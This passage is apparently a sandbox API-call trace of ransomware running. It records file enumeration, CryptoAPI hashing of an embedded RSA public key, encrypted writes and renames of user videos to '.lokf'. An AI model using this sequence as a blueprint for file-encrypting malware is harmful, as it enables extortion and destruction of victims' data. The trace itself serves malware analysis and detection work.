KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.047] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.048] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.048] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.048] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.048] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.048] GetLastError () returned 0x0 [0061.048] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.048] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.048] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.048] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.049] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa500) returned 0x9c8dae8 [0061.049] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86b60 [0061.049] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.049] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa4f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.050] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.050] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.050] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.050] CloseHandle (hObject=0x5cc) returned 1 [0061.051] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\qj8V72.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qj8v72.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\qj8V72.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qj8v72.mp4.lokf")) returned 1 [0061.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.051] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.052] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8059fcd0, ftCreationTime.dwHighDateTime=0x1d4d381, ftLastAccessTime.dwLowDateTime=0xfe79f240, ftLastAccessTime.dwHighDateTime=0x1d4d184, ftLastWriteTime.dwLowDateTime=0xfe79f240, ftLastWriteTime.dwHighDateTime=0x1d4d184, nFileSizeHigh=0x0, nFileSizeLow=0x21e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QnhLHVtA0q.flv", cAlternateFileName="QNHLHV~1.FLV")) returned 1 [0061.052] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\QnhLHVtA0q.flv") returned=".flv" [0061.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\QnhLHVtA0q.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qnhlhvta0q.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.052] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=8679) returned 1 [0061.052] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.055] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x21c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.055] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.056] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x21e7, lpOverlapped=0x0) returned 1 [0061.056] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.056] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.056] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.056] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.056] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.057] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.057] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.057] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.057] GetLastError () returned 0x0 [0061.057] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.057] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.057] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.057] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.057] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x21f0) returned 0x9c8dae8 [0061.057] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86ba8 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861c0 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86bf0 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861d8 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86208 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86220 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.057] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86220 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86208 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.058] GetCurrentThreadId () returned 0x9e0 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c370 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0061.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.059] GetCurrentThreadId () returned 0x9e0 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86208 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86220 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861f0 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86238 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86208 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86238 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, 